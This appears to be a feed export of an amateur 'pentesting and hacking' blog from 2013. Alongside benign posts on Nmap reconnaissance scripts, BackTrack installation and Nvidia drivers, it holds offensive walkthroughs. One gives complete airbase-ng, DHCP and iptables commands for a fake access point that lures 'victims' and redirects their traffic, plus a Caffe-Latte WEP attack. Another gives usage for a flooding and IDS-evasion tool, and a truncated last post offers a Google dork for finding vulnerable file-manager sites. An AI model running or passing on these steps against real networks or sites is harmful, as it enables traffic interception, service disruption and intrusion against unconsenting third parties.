tag:blogger.com,1999:blog-34426837682558411912024-03-18T20:46:32.590-07:00Pentesting and Hacking Blog./Welcome -in blog ONLY -Pentesting and ./HACKING Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comBlogger34125tag:blogger.com,1999:blog-3442683768255841191.post-21567445323027019212013-03-09T06:42:00.000-08:002013-03-09T06:42:05.322-08:00Nmap all scripts <div dir="ltr" style="text-align: left;" trbidi="on">
Nmap is tool that can perform various activities in a penetration
test.The function of NSE (Nmap Scripting Engine) and the scripts that
have written so far they can transform Nmap to a multi purpose tool.For
example we can use Nmap during the information gathering stage of a
penetration test just by using the appropriate scripts.In this article
we will examine those scripts and the information that we can extract.
<br />
One of our first steps it can be to determine the origin of the IP
address that our client has given to us.Nmap includes in his database a
couple of scripts for this purpose.If we want to run all these scripts
we can use the following command as it can be seen in the image below:<br />
<br />
<div class="wp-caption alignnone" id="attachment_1787" style="width: 555px;">
<a href="http://pentestlab.files.wordpress.com/2013/02/ipgeolocation.png"><img alt="Nmap - IP Geolocation" class="size-full wp-image-1787" src="http://pentestlab.files.wordpress.com/2013/02/ipgeolocation.png?w=645" /></a><div class="wp-caption-text">
Nmap – IP Geolocation</div>
</div>
<br />
As we can see the script called an external website (geobytes) in order to determine the coordinates and location of our target.<br />
<h2>
Whois</h2>
The command Whois can be run directly through the console in Linux
environments.However there is a specific script for Nmap that performs
the same job and it can be used.This script will return information
about the registrar and contact names.<br />
<div class="wp-caption alignnone" id="attachment_1788" style="width: 530px;">
<a href="http://pentestlab.files.wordpress.com/2013/02/whois.png"><img alt="Nmap - Whois" class="size-full wp-image-1788" src="http://pentestlab.files.wordpress.com/2013/02/whois.png?w=645" /></a><div class="wp-caption-text">
Nmap – Whois</div>
</div>
<br />
<h2>
Email Accounts</h2>
Email accounts can prove also important in a penetration test as it
can be used as usernames,in social engineering engagements (i.e Phishing
Attacks)or in a situation where we have to conduct brute force attacks
against the mail server of the company.There are two scripts available
for this job:<br />
<ul>
<li>http-google-email</li>
<li>http-email-harvest</li>
</ul>
The http-google-email script uses the Google Web and Google Groups in
order to search for emails about the target host while the
http-email-harvest spiders the web server and extracts any email
addresses that it discovers.The http-email-harvest is in the official
repository of Nmap and the http-google-email script can be downloaded
from <a href="http://seclists.org/nmap-dev/2011/q3/att-401/http-google-email.nse" target="_blank" title="nmap-google-email">here</a>.<br />
<div class="wp-caption alignnone" id="attachment_1789" style="width: 647px;">
<a href="http://pentestlab.files.wordpress.com/2013/02/email.png"><img alt="Nmap - Discover Email Accounts" class="size-full wp-image-1789" src="http://pentestlab.files.wordpress.com/2013/02/email.png?w=645" /></a><div class="wp-caption-text">
Nmap – Discover Email Accounts</div>
</div>
<br />
<h2>
Brute Force DNS Records</h2>
DNS records contains a lot of information about a particular domain
which cannot be ignored.Of course there are specific tools for brute
forcing DNS records which can produce better results but the dns-brute
script can perform also this job in case that we want to extract DNS
information during our Nmap scans.<br />
<div class="wp-caption alignnone" id="attachment_1791" style="width: 521px;">
<a href="http://pentestlab.files.wordpress.com/2013/02/dnsbrute.png"><img alt="Nmap - Brute Forcing DNS" class="size-full wp-image-1791" src="http://pentestlab.files.wordpress.com/2013/02/dnsbrute.png?w=645" /></a><div class="wp-caption-text">
Nmap – Brute Forcing DNS</div>
</div>
<br />
<h2>
Discovering Additional Hostnames</h2>
We can discover additional hostnames that are based on the same IP address with the nmap script <strong><span style="color: blue;">http-reverse-ip</span></strong>.This
script can help us to find other web applications that exist on the
same web server.It is an external script that can be downloaded from <a href="http://seclists.org/nmap-dev/2011/q3/att-401/http-reverse-ip.nse" target="_blank" title="http-reverse-ip">here</a>.<br />
<div class="wp-caption alignnone" id="attachment_1792" style="width: 523px;">
<a href="http://pentestlab.files.wordpress.com/2013/02/reverseip.png"><img alt="Nmap - Reverse IP " class="size-full wp-image-1792" src="http://pentestlab.files.wordpress.com/2013/02/reverseip.png?w=645" /></a><div class="wp-caption-text">
Nmap – Reverse IP</div>
</div>
<br />
<strong><span style="color: red;">Conclusion</span></strong><br />
In this article we examined some Nmap scripts (internal and external)
that can be used during the information gathering stage of a
penetration test and before we start the actual scanning.The information
that we have obtained proves that Nmap can perform almost any task with
his scripts.If it cannot do something that you want then it is time to
write your own Lua scripts and to contribute to the community.<br />
Root-Dev on <a href="https://www.facebook.com/root.develop" target="_blank">Facebook</a><br />
Root-Dev <a href="http://www.root-dev.linuxsecured.net/" target="_blank">Website</a> </div>
Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-64339680718020672072013-02-27T09:37:00.000-08:002013-02-27T09:37:11.927-08:00Install BackTrack on Android Tablet [[FULL Tut0]]<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz4HpjNhOA6ykc14ryOywSdsIesHS2RwnqtK5MoPQvy0sFkX328XOy1neFi0psfPtl-EG2VWHtr40SUbPtFAyMD7nEOtyN9wu3IqldbY4quky7FqP_7J6TDRmPA1Bnb5xHFabWMy6l2Nw/s1600/Backtrack+on+Android+10.jpg" style="margin-left: 1em; margin-right: 1em;"><img alt="Install Backtrack on Android Tablet" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz4HpjNhOA6ykc14ryOywSdsIesHS2RwnqtK5MoPQvy0sFkX328XOy1neFi0psfPtl-EG2VWHtr40SUbPtFAyMD7nEOtyN9wu3IqldbY4quky7FqP_7J6TDRmPA1Bnb5xHFabWMy6l2Nw/s320/Backtrack+on+Android+10.jpg" title="Install Backtrack on Android Tablet" width="320" /></a></div>
<br /><span id="goog_1374286030"></span>
Now prepare the tools and device to install Backtrack on Android tablet.<br />
<br />
1. Backtrack 5 ARM.<br />
<a href="http://www.backtrack-linux.org/downloads/" rel="nofollow">Download Backtrack 5 ARM</a>
from Backtrack official site. Backtrack with ARM architecture only on
Backtrack 5 version. ARM architecture not available for Backtrack 5
R1, Backtrack 5 R2, and Backtrack 5 R3.<br />
<br />
2. Rooted Galaxy Tab 10.1<br />
Why rooted Galaxy Tab? Because we need install some application that need Android to be root :-)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPBvGpg185RzNvEoLyXEK0V_8l-qn2PASQTPvkdq5phCndWqbxrBLHnyq-U-JY0-hZkdqhaGYG__3N2Z91W7c2tOtTKpMWPZaWIIwsybLWejSLlSULS4W0BjSPapvUQMXLE1TGB7nsaKw/s1600/gtab10.1.jpg" style="margin-left: 1em; margin-right: 1em;"><img alt="Install Backtrack on Galaxy Tab" border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPBvGpg185RzNvEoLyXEK0V_8l-qn2PASQTPvkdq5phCndWqbxrBLHnyq-U-JY0-hZkdqhaGYG__3N2Z91W7c2tOtTKpMWPZaWIIwsybLWejSLlSULS4W0BjSPapvUQMXLE1TGB7nsaKw/s320/gtab10.1.jpg" title="Install Backtrack on Galaxy Tab" width="320" /></a></div>
<br />
<br />
3. Busybox, Superuser, Terminal Emulator, and AndroidVNC.<br />
You can download search and all of them on <a href="http://play.google.com/" rel="nofollow">Google Play</a>.
BusyBox is installer and uninstaller Android program, Superuser is
superuser rights manager for Android, Terminal Emulator is Android's
built-in Linux command line shell program, and AndroidVNC is a VNC
viewer for Android.<br />
<br />
<h1 style="font-size: 16px;">
How to Install Backtrack on Android Tablet?</h1>
<br />
1. Extract BT5-GNOME-ARM.7z to folder, for example "BT5" folder and then put on Galaxy Tab root directory.<br />
<br />
2. Open Terminal Emulator on Galaxy Tab then go to BT5 folder with command prompt. Here the command<br />
<code>cd sdcard/BT5</code><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmm7wm6vR6Z-2dOivLcZDhqkeVcigX13_gk9Xu1FVdYP6PjVNFsjvvgeF9NGiwnDe8phybQPLRiK7hMAWRWBGTY1FjHon1GarGnjfn2gk8gmogngZgmj5jZGDjfE51_j-kjhQD8nql-2M/s1600/Backtrack+on+Android+1.jpg" style="margin-left: 1em; margin-right: 1em;"><img alt="Install Backtrack on Android Tablet 1" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmm7wm6vR6Z-2dOivLcZDhqkeVcigX13_gk9Xu1FVdYP6PjVNFsjvvgeF9NGiwnDe8phybQPLRiK7hMAWRWBGTY1FjHon1GarGnjfn2gk8gmogngZgmj5jZGDjfE51_j-kjhQD8nql-2M/s320/Backtrack+on+Android+1.jpg" title="Install Backtrack on Android Tablet 1" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnKSR_ALs3za1uL-Q8knYp97UPTWxltZacuOj2Fvo7Yg9pKQkESwSPHs7TZJRh9OtocI_FtC-ieFLwrDJi_XWqM6GGqB12dT_3AcvppKz5SdYF-ZrQZpoIirRhFqK1ZHH2mbBdd7A-Ux8/s1600/Backtrack+on+Android+4.jpg" style="margin-left: 1em; margin-right: 1em;"><img alt="Install Backtrack on Android Tablet 2" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnKSR_ALs3za1uL-Q8knYp97UPTWxltZacuOj2Fvo7Yg9pKQkESwSPHs7TZJRh9OtocI_FtC-ieFLwrDJi_XWqM6GGqB12dT_3AcvppKz5SdYF-ZrQZpoIirRhFqK1ZHH2mbBdd7A-Ux8/s320/Backtrack+on+Android+4.jpg" title="Install Backtrack on Android Tablet 2" width="320" /></a></div>
<code><br /></code>
<br />
3. Then run this following command and you will se root@localhost :-)<br />
<code>su<br />
sh bootbt</code><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjACyjyZhiftXLV_ytxRovzos9MxguqJkFiOA1hyqDsjOXv09QCUWiAgD-Qx7qW_6Q595vh3DvMckYmKd_g7GbYBkGsqi5fewuTs44_dgqj3zlc50FD6qFG6Lc-1V59IpPHAVx0pyiqeks/s1600/Backtrack+on+Android+5.jpg" style="margin-left: 1em; margin-right: 1em;"><img alt="Install Backtrack on Android Tablet 3" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjACyjyZhiftXLV_ytxRovzos9MxguqJkFiOA1hyqDsjOXv09QCUWiAgD-Qx7qW_6Q595vh3DvMckYmKd_g7GbYBkGsqi5fewuTs44_dgqj3zlc50FD6qFG6Lc-1V59IpPHAVx0pyiqeks/s320/Backtrack+on+Android+5.jpg" title="Install Backtrack on Android Tablet 3" width="320" /></a></div>
<code><br /></code>
<br />
4. Now lets run Backtrack GUI with VNC viewer<br />
<code>startvnc</code><br />
<br />
5. To connect wth VNC we must know the port where VNC listening. Run <code>netstat -anpt</code> and remember the port where VNC listening. In this case the port is 5901<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1UVBQzDGr8XX9l7ZWd23PwWbEgaDEllQ1RWb-F7ce3AnOt-kPrtUWkRPQPuEQKi_AqueIHjyNXmxWfOs3SoZ_4SuhvHcgmUUSqwhjI-WgOaw_7bFNFxi6Dl65-cuL7jUkdL-39Bt4Qxo/s1600/Backtrack+on+Android+7.jpg" style="margin-left: 1em; margin-right: 1em;"><img alt="Install Backtrack on Android Tablet 4" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1UVBQzDGr8XX9l7ZWd23PwWbEgaDEllQ1RWb-F7ce3AnOt-kPrtUWkRPQPuEQKi_AqueIHjyNXmxWfOs3SoZ_4SuhvHcgmUUSqwhjI-WgOaw_7bFNFxi6Dl65-cuL7jUkdL-39Bt4Qxo/s320/Backtrack+on+Android+7.jpg" title="Install Backtrack on Android Tablet 4" width="320" /></a></div>
<br />
<br />
6. Open AndroidVNC and fill the form like this:<br />
Nickname : BT5<br />
Password : toortoor<br />
Address : 127.0.0.1<br />
Port : 5901<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEqIuEVOVh7GA2pbVn1_D3IOlwf3zBvixH-t82bnCL3eFyig4wKqvYrIydl2wMIL-_ob-_YqdUbb78iSCiBBrEWBwFSd4CwyzxNvAd7Ud2fjxfW8w8HlCJkL3RoylNeDELM63Z1oMbr3U/s1600/Backtrack+on+Android+8.jpg" style="margin-left: 1em; margin-right: 1em;"><img alt="Install Backtrack on Android Tablet 5" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEqIuEVOVh7GA2pbVn1_D3IOlwf3zBvixH-t82bnCL3eFyig4wKqvYrIydl2wMIL-_ob-_YqdUbb78iSCiBBrEWBwFSd4CwyzxNvAd7Ud2fjxfW8w8HlCJkL3RoylNeDELM63Z1oMbr3U/s320/Backtrack+on+Android+8.jpg" title="Install Backtrack on Android Tablet 5" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzxwJ1nGGBQemUBG_msoWRNPqCv9IHmq-uqPNMlXRuUccwuNmnrtnko3Q8MTm7OQtLJOky8l5f8sh01p8Iks9TYYd9cYX8VJkGv0bDRjT3FjJLYJyxNbkPrswnjXsFVUuwmIzljVBALQU/s1600/Backtrack+on+Android+9.jpg" style="margin-left: 1em; margin-right: 1em;"><img alt="Install Backtrack on Android Tablet 6" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzxwJ1nGGBQemUBG_msoWRNPqCv9IHmq-uqPNMlXRuUccwuNmnrtnko3Q8MTm7OQtLJOky8l5f8sh01p8Iks9TYYd9cYX8VJkGv0bDRjT3FjJLYJyxNbkPrswnjXsFVUuwmIzljVBALQU/s320/Backtrack+on+Android+9.jpg" title="Install Backtrack on Android Tablet 6" width="320" /></a></div>
<br />
7. Connect it and you will see Backtrack 5 interface :-)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3w9RvaHph1SwNoNT72oLuPuiLxY6BsoKizO0jjNa5nwzHjfMx7Rq68psGaS8Cnv4EmaEm0Z_ZRMBpNaBNy9mzE_GeOLDbUQfg9367gv0p45dN_cOoozBbzBkLKhJ48h9o2E0wWAsWWEg/s1600/Backtrack+on+Android+11.jpg" style="margin-left: 1em; margin-right: 1em;"><img alt="Install Backtrack on Android Tablet 7" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3w9RvaHph1SwNoNT72oLuPuiLxY6BsoKizO0jjNa5nwzHjfMx7Rq68psGaS8Cnv4EmaEm0Z_ZRMBpNaBNy9mzE_GeOLDbUQfg9367gv0p45dN_cOoozBbzBkLKhJ48h9o2E0wWAsWWEg/s320/Backtrack+on+Android+11.jpg" title="Install Backtrack on Android Tablet 7" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLREjK6xJoL-m6IcT_rLAI37fjFKBt1Wsmqjn24IHFD-ZVzfFtZjuoasy1E7kJyjfwvZQWWN2daP-er6IzIDWeh-7BweeWAZj2diJR4AgEUpGzSbr8iEZoGPut2lG0ZsS_1mRCIF5j-9Q/s1600/Backtrack+on+Android+12.jpg" style="margin-left: 1em; margin-right: 1em;"><img alt="Install Backtrack on Android Tablet 8" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLREjK6xJoL-m6IcT_rLAI37fjFKBt1Wsmqjn24IHFD-ZVzfFtZjuoasy1E7kJyjfwvZQWWN2daP-er6IzIDWeh-7BweeWAZj2diJR4AgEUpGzSbr8iEZoGPut2lG0ZsS_1mRCIF5j-9Q/s320/Backtrack+on+Android+12.jpg" title="Install Backtrack on Android Tablet 8" width="320" /></a></div>
<br />
<br />
Remember! Some of the Backtrack tools can't work properly and do it for your own risk. I hope you can <b><u>Install Backtrack on Android tablet</u></b> without any problems, tell me if you get problems.<br />
Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-51645784929001929672013-02-18T09:07:00.001-08:002013-02-18T09:09:56.814-08:00Fake AP Airbase-ng<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuPXibdrzlwBMiu3EVOf6SVcEI_XDHUFbrks7hXRiO2KRjLYoDfg-xrgOZ1rHMuY2fuDmu0PORMq4sS5TEPDMM9GGvPgabKwvms-82bpHk5Qb6qr_P_tPY_ESJvxteFEf3gCqcjAsnwAc/s1600/airbase_logo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuPXibdrzlwBMiu3EVOf6SVcEI_XDHUFbrks7hXRiO2KRjLYoDfg-xrgOZ1rHMuY2fuDmu0PORMq4sS5TEPDMM9GGvPgabKwvms-82bpHk5Qb6qr_P_tPY_ESJvxteFEf3gCqcjAsnwAc/s1600/airbase_logo.jpg" height="160" width="320" /></a></div>
This tutorial i will show you how to set up a simple fake AP with
airbase-ng This can be used for multiple reasons like attacking non
associated victims forcing them to automatic connect to ur AP thinking
it is their own legit AP the first thing we will need to do is set up
airbase-ng<br />
<br />
<div class="bbcode_container">
<div class="bbcode_description">
Code:</div>
<pre class="bbcode_code" style="height: 36px;">airbase-ng -e BTHomeHub2 -c 1 wlan0</pre>
</div>
Options:<br />
-e Essid For AP<br />
-c Channel Number<br />
wlan0 Wireless Interface<br />
This will then create a tap device like below<br />
<br />
<div class="bbcode_container">
<div class="bbcode_description">
Code:</div>
<pre class="bbcode_code" style="height: 84px;">root@bt:~# airbase-ng -e BTHomeHub2 -c 1 wlan0
08:15:24 Created tap interface at0
08:15:24 Trying to set MTU on at0 to 1500
08:15:24 Trying to set MTU on wlan0 to 1800
08:15:24 Access Point with BSSID 00:C0:CA:47:32:24 started.</pre>
</div>
airbase-ng Options<br />
-e Essid<br />
-c Channel Number<br />
wlan0 wireless interface<br />
Now that we have the ap running we need to make it so the clients can obtain a ip address so lets set up are ip tables<br />
<br />
<div class="bbcode_container">
<div class="bbcode_description">
Code:</div>
<pre class="bbcode_code" style="height: 60px;">ifconfig at0 up
ifconfig at0 192.168.1.254 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.254</pre>
</div>
Now that we have are ip tables set for the client we need to configure are dhcp3 server a little<br />
here is my dhcp.conf<br />
<br />
<div class="bbcode_container">
<div class="bbcode_description">
Code:</div>
<pre class="bbcode_code" style="height: 156px;">ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.1.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.1.255;
option routers 192.168.1.254;
option domain-name-servers home;
range 192.168.1.1 192.168.1.140;
}</pre>
</div>
just simply add this to the bottom of ur /etc/dhcp3/dhcp.conf<br />
Once that has been entered & saved dhcp server can be started<br />
<br />
<div class="bbcode_container">
<div class="bbcode_description">
Code:</div>
<pre class="bbcode_code" style="height: 36px;">/etc/init.d/dhcp3-server start</pre>
</div>
Now all we have left to do is to configure the routing table for the AP<br />
<br />
<div class="bbcode_container">
<div class="bbcode_description">
Code:</div>
<pre class="bbcode_code" style="height: 132px;">iptables –flush
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
iptables –table nat –append POSTROUTING –out-interface wlan0 -j MASQUERADE
iptables –append FORWARD –in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -j DNAT –to 192.168.1.254
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000
echo 1 &gt; /proc/sys/net/ipv4/ip_forward</pre>
</div>
Now you should
have a fully functional Fake ap if you would like to have this fake ap
run the caffe-latte attack just add to the airbase-ng -L -W 1 -x 150 for
example<br />
<br />
<div class="bbcode_container">
<div class="bbcode_description">
Code:</div>
<pre class="bbcode_code" style="height: 36px;">airbase-ng -L -W 1 -x 150 -e BTHomeHub2 -c 1 wlan0</pre>
</div>
My Output<br />
<div class="bbcode_container">
<div class="bbcode_description">
Code:</div>
<pre class="bbcode_code" style="height: 108px;">root@bt:~# airbase-ng -L -W 1 -x 150 -e BTHomeHub2 -c 1 wlan0
08:33:13 Created tap interface at0
08:33:13 Trying to set MTU on at0 to 1500
08:33:13 Access Point with BSSID 00:C0:CA:47:32:24 started.
08:33:22 Client 00:1F:1F:14:4D:6B associated (WEP) to ESSID: “BTHomeHub2″
08:33:32 Client 00:1F:1F:14:4D:6B associated (WEP) to ESSID: “BTHomeHub2″
08:33:32 Starting Caffe-Latte attack against 00:1F:1F:14:4D:6B at 150 pps.</pre>
</div>
airbase-ng Options<br />
-L caffe-latte attack<br />
-L WEP encrytion on<br />
-x Number of packets to send<br />
-e Essid<br />
-c channel Number<br />
wlan0 wireless interface<br />
The only problem is that I haven’t managed to get the caffe-latte
attack fully working due to the fact that the only time it captures Iv
correctly is when the client reconnects to the ap so the only way ivs
had caffe-latte working kind of well is to DE authenticate the client
every 10 seconds.<br />
Visit <a href="http://www.root-dev.linuxsecured.net/" target="_blank">Root Developpers</a><br />
And Facebook Page : <a href="https://www.facebook.com/root.develop" target="_blank">https://www.facebook.com/root.develop</a> Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-47428673767075530802013-02-15T07:07:00.000-08:002013-02-15T07:09:06.786-08:00How to add menu backtrack on ubuntu.<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL4uMbMVv-3DEKTJfHh1sHKZPWKPYvpODR5VWBjjYveWTOTTGxDzFa6GRL2LqCtBBkcqsVTe1rM_DYise4tkdz4yQzcJk1If6k8X2z_quCBjcd3UI-CpwMqarC7cehF-mCroW0yP4Zy1s/s1600/dragonHead.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL4uMbMVv-3DEKTJfHh1sHKZPWKPYvpODR5VWBjjYveWTOTTGxDzFa6GRL2LqCtBBkcqsVTe1rM_DYise4tkdz4yQzcJk1If6k8X2z_quCBjcd3UI-CpwMqarC7cehF-mCroW0yP4Zy1s/s1600/dragonHead.png" /></a><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/agr0KHwHQYU?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<span style="font-size: large;"><span style="font-family: Arial,Helvetica,sans-serif;"><b>Download menu from : <a href="http://sourceforge.net/projects/backtrackubuntu/files/latest/download?source=recommended" target="_blank">sourceforge</a>.</b></span></span>Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-1108168088136793542013-02-09T12:36:00.003-08:002013-02-09T12:36:46.036-08:00wHydah Linux Distrubution!<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<span class="userContent"><img alt="" class="spotlight" height="160" src="https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-frc1/812624_215641108579241_1301402238_o.jpg" style="height: 876px; width: 1095px;" width="200" />Welcome back my Team : AirTeam , have creat new wHydah Linux Distriubution ! <br /> BackTrack WHYDAH Official Forum/Website : <a href="http://www.whydah.airteam.org/" rel="nofollow nofollow" target="_blank">http://www.whydah.airteam.org/</a><br /> Download the new version : <a href="http://sourceforge.net/projects/airteam/" rel="nofollow nofollow" target="_blank">http://sourceforge.net/projects/airteam/</a><br /> Facebook FanPage : <a href="https://www.facebook.com/airteam.org" rel="nofollow" target="_blank">https://www.facebook.com/airteam.org</a><br /> Team AirTeam : Sam Bellamy , Bond Benz , MasterButcher68.<br /> HaveFun.</span></div>
Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-25843362597518984922013-02-07T13:15:00.000-08:002013-02-07T13:15:15.602-08:00How to install Nvidia Drivers.<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwLrnRQZE-4Nk-YW34Rox5p4mWjJ6Ak0DbibhyI_3HJ6N1nEFRhVjJ_iY3taryEee7VGdAcknekVJ3y_xg9QWSgzTpDUzsi2kivMPxSjj75-87LmS9V9dPGZCC1tOIqczwtwPFwOpyZk4/s1600/NVIDIA.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwLrnRQZE-4Nk-YW34Rox5p4mWjJ6Ak0DbibhyI_3HJ6N1nEFRhVjJ_iY3taryEee7VGdAcknekVJ3y_xg9QWSgzTpDUzsi2kivMPxSjj75-87LmS9V9dPGZCC1tOIqczwtwPFwOpyZk4/s1600/NVIDIA.gif" height="213" width="320" /></a></div>
Hi for those who are having trouble installing nvidia, " DO NOT MESS WITH THE KERNEL OR MODIFY ANYTHING"!<br />
This is the correct way to go:<br />
<br />
1) download synaptic : apt-get install synaptic.<br />
2) make sure Software sources is available under ADMINISTRATION.<br />
<br />
DO NOT ACTIVATE ANY UPDATE FROM SOFTWARE SOURCES.<br />
<br />
3) Here is the best solution for you ( tested and running on HP G70, Gforce 9200M , Backtrack 5 Gnome 32bit).<br />
<br />
Open terminal and paste: <span style="color: red;">add-apt-repository ppa:ubuntu-x-swat/x-updates</span><br />
*** The system will ask you to if you want to install " add " say Y.<br />
Make sure the ppa is installed, re-paste the above command if necessary.<br />
<br />
Again in the terminal : <span style="color: red;">apt-get update && apt-get install nvidia-current nvidia-current-modaliases nvidia-settings</span><br />
<br />
*** Reboot<br />
<br />
Again in the terminal paste : <span style="color: red;">nvidia-xconfig</span><br />
<br />
*** Reboot again and you're good to go.<br />
<br />
Hope this helps.<br />
GD<br />
<br />
Ps: you might want to fix the grub, do it this way; <span style="color: red;">nano /etc/default/grub</span><br />
Scroll down to : <span style="color: red;">#GRUB_GFXMODE=640×480</span><br />
Uncomment # ( take # off the script. like this : <span style="color: red;">GRUB_GFXMODE=640×480</span>)<br />
Set you screen resolution according to your screen, mine is 1440x900 !<br />
Now hit : CTRL+o to overwrite >>Enter, CTRL + x to save and exit.<br />
Now in terminal : <span style="color: red;">update-grub</span><br />
<br />
Good luck. </div>
Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-43265401192009572832013-02-06T02:42:00.000-08:002013-02-06T02:42:03.603-08:00Tool Inundator Flooder / Ddoser<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTPd0C3WLjoXdlUvdzR_-XqzNzu4DZcK3rsiTNW5m1qYMiv8acCbmwR3QC_DUjpttQWH2XJ73sIKmOan6IilxAhqwLovrsy9EqwvCb15veZzNIPZZOpTzLM87DQseuZS7ETCQExrruSq0/s1600/269383.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTPd0C3WLjoXdlUvdzR_-XqzNzu4DZcK3rsiTNW5m1qYMiv8acCbmwR3QC_DUjpttQWH2XJ73sIKmOan6IilxAhqwLovrsy9EqwvCb15veZzNIPZZOpTzLM87DQseuZS7ETCQExrruSq0/s1600/269383.jpeg" /></a></div>
Name : Tool Inundator (BackTrack 5 R3)<br />
Description : IDS/IPS/WAF Evasion & Flooding<br /><br /><br />
<b>cd /pentest/stressing/inundator</b><br /><br />
<b>ls</b><br /><br />
<span style="color: red;"><b>Usage : </b></span><br />
<b>./inundator.pl --verbose --threads 10 <IP></b><br /><br />if you don't have backtrack r3 download from : <br />
<a href="http://sourceforge.net/projects/inundator/" target="_blank">http://sourceforge.net/projects/inundator/</a><br />
<br />
Don't forget to visit our page on facebook : <a href="https://www.facebook.com/BackTrack.linuxr3" target="_blank">BackTrack - Linux</a><br />
and Root Developper Website : <a href="http://www.root-dev.zzl.org/" target="_blank">www.root-dev.zzl.org</a>Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-72402498511013477652013-02-05T08:29:00.001-08:002013-02-05T08:29:27.957-08:00Ajax file manager vulnerability<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-size: small;">Open Google Web Page and <span style="font-size: small;">Put this dork ( vuln ) o<span style="font-size: small;">n search :<span style="color: red;"> inurl:/plugins/ajaxfilemanager/</span></span></span><span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"><span class="Apple-style-span" style="background-color: whitesmoke; line-height: 18px; text-align: justify;"></span></span><span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"></span></span><span style="font-size: small;"><span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"></span></span><br />
